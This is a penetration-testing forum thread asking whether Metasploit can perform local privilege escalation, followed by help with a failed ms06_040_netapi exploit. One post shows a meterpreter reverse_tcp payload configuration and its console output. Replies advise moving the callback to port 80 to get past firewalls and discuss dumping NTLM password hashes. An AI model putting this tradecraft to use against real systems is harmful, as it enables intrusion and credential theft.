.

Metasploit Question

<<

SynJunkie

Jr. Member
Jr. Member

Posts: 71

Joined: Thu Apr 17, 2008 2:41 pm

Location: UK

Post Thu Nov 13, 2008 6:44 pm

Metasploit Question

Hi guys, I have a question regarding Metasploit. 

I'm happy with the process for running Metasploit against a remote host and with using the msfpayload function of Metasploit but...

Is it possible to create an executable using Metasploit that will exploit a vulnerabilty on the local machine that is running in the context of a restricted user to raise the priviledges of the user or execute any other payload that is specified such as create an Administrative Account or install a VNC server and connect back to another host?

Maybe i have missed something, but to run a payload that was created with msfpayload it seems to asume that the user/victim already has administrative rights on the target PC.
----------------------------------
http://synjunkie.blogspot.com
<<

LSOChris

Post Fri Nov 14, 2008 4:56 pm

Re: Metasploit Question

SynJunkie wrote:Hi guys, I have a question regarding Metasploit. 

I'm happy with the process for running Metasploit against a remote host and with using the msfpayload function of Metasploit but...

Is it possible to create an executable using Metasploit that will exploit a vulnerabilty on the local machine that is running in the context of a restricted user to raise the priviledges of the user or execute any other payload that is specified such as create an Administrative Account or install a VNC server and connect back to another host?

no, metasploit doesnt have local exploits

Maybe i have missed something, but to run a payload that was created with msfpayload it seems to asume that the user/victim already has administrative rights on the target PC.


you can send a reverse shell out running as a regular user but you'll only get a shell with that user's privs.
<<

pseud0

User avatar

Recruiters
Recruiters

Posts: 210

Joined: Sat Nov 17, 2007 8:26 pm

Location: Detroit, Michigan

Post Fri Nov 14, 2008 5:16 pm

Re: Metasploit Question

You're referring to privilege escalation on a machine that you already have some level of access to?  There are a lot of tools you can use for that, but metasploit sure wouldn't be my first choice.  They plan to built it out in the future to do this via the meterpreter tool, but it still doesn't seem to be the best option.  Hell, you could just pick the relevant exploit out of:

http://www.milw0rm.com/local.php
CISSP, CISM, CISA, GCIH, GREM, CEH, HMFIC, KTHXBIROFLCOPTER
<<

SynJunkie

Jr. Member
Jr. Member

Posts: 71

Joined: Thu Apr 17, 2008 2:41 pm

Location: UK

Post Fri Nov 14, 2008 7:33 pm

Re: Metasploit Question

Thanks.  I was hoping I could do something with MetaSploit but maybe i'll wait for  that.

Cheers

Syn
----------------------------------
http://synjunkie.blogspot.com
<<

ethicalhack3r

Full Member
Full Member

Posts: 139

Joined: Fri Nov 28, 2008 11:29 am

Post Fri Nov 28, 2008 11:32 am

Re: Metasploit Question

You can use Metasploit's meterpreter payload to either drop the machines NTLM hashes then crack them or upload a local exploit and execute it.

I posted about meterpreter recently on my personal blog.

http://www.ethicalhack3r.co.uk
<<

finalversion_2k

Newbie
Newbie

Posts: 1

Joined: Thu Jan 14, 2010 2:15 am

Post Mon Jan 18, 2010 5:04 am

Re: Metasploit Question

guyzz i need ur help in metasploit i'm new ... i set these configuration exploit was completed but session was not created :'(so can u tell me where i was wrong... can any one help me.. ??? Thanx in advance...
Module options:

  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOST    192.168.1.2      yes      The target address
  RPORT    445              yes      Set the SMB service port
  SMBPIPE  BROWSER          yes      The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread          yes      Exit technique: seh, thread, process
  LHOST    192.168.1.11    yes      The local address
  LPORT    4444            yes      The local port


Exploit target:

  Id  Name
  --  ----
  0  (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)


msf exploit(ms06_040_netapi) > exploit

[*] Started reverse handler on port 4444
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Exploit completed, but no session was created.
<<

bamed

Newbie
Newbie

Posts: 48

Joined: Thu Mar 19, 2009 7:05 pm

Location: Joplin, MO

Post Mon Jan 18, 2010 8:04 am

Re: Metasploit Question

There's nothing necessarily wrong with your settings, assuming of course that you have the IPs and ports right, but those are specific to your environment, and only you can know those.
What you're looking at here basically is that your exploit failed.  This could be because the system isn't vulnerable to the exploit you're trying.  It also could be a firewall getting in the way.  It's possible the remote system has a firewall that's preventing your payload from connecting back to your station.
I'm assuming your in an environment where you have access to the system your exploiting, so check to see if there's a firewall running, or any other software that might be protecting the system.  Also make sure you're not running a firewall on the local machine.
I'd also double check the exploit your using.  Research it and find out what it's exploiting. Also was there a patch to fix the vulnerability?  If so (and there probably is), has the patch been applied to the system?
BTW, if the problem is firewal/security software related, you might try a different payload, or a different port.  For example, there may be a firewall that only allows outgoing traffic on certain ports.  Outgoing port 4444 is probably blocked in this circumstance.  If the firewall is blocking based on port, then use a port that wouldn't be blocked, like port 80.  Just make sure you aren't running a local web server so port 80 is free.
So to recap:
1. Make sure the system is vulnerable and not patched. (FYI, details on the vulnerability can be found at: http://www.microsoft.com/technet/securi ... 6-040.mspx )
2. Check for firewall on the remote system (on the local system too for that matter)
3. Try a common port that isn't likely to be blocked
4.  One more thing, if you really want to see what's happening

Hope this helps.
chown -R bamed ./base
<<

d3l0n

Jr. Member
Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Mon Jan 18, 2010 9:26 pm

Re: Metasploit Question

ethicalhack3r wrote:You can use Metasploit's meterpreter payload to either drop the machines NTLM hashes then crack them or upload a local exploit and execute it.

I posted about meterpreter recently on my personal blog.

http://www.ethicalhack3r.co.uk


Dumping the hash will not work because it requires administrator rights.
<<

jonas

Newbie
Newbie

Posts: 46

Joined: Mon Jun 08, 2009 9:04 pm

Post Wed Jan 20, 2010 3:52 pm

Re: Metasploit Question

I think maybe you're wrong about that.  If i remember correctly i dumped the hash with meterpreters hashdump only having usr privs.
That was after i was unsuccessful with pwdump through cmd shell.
<<

d3l0n

Jr. Member
Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Fri Jan 22, 2010 3:27 pm

Re: Metasploit Question

jonas, unless you managed to run it as a scheduled task which runs with system privileges  you won't be able to dump the hash.
<<

timmedin

User avatar

Sr. Member
Sr. Member

Posts: 469

Joined: Thu Feb 05, 2009 11:18 pm

Post Sun Jan 31, 2010 9:52 pm

Re: Metasploit Question

d3l0n wrote:jonas, unless you managed to run it as a scheduled task which runs with system privileges  you won't be able to dump the hash.


d3l0n is right, you have to have admin or system level privileges in order to dump the hashes.
twitter.com/timmedin | http://blog.securitywhole.com
<<

jonas

Newbie
Newbie

Posts: 46

Joined: Mon Jun 08, 2009 9:04 pm

Post Tue Feb 02, 2010 4:17 pm

Re: Metasploit Question

Obviously didnt remember correctly.... hehe.
Well, local exploits and its all solved anyways i guess =)

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 2 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software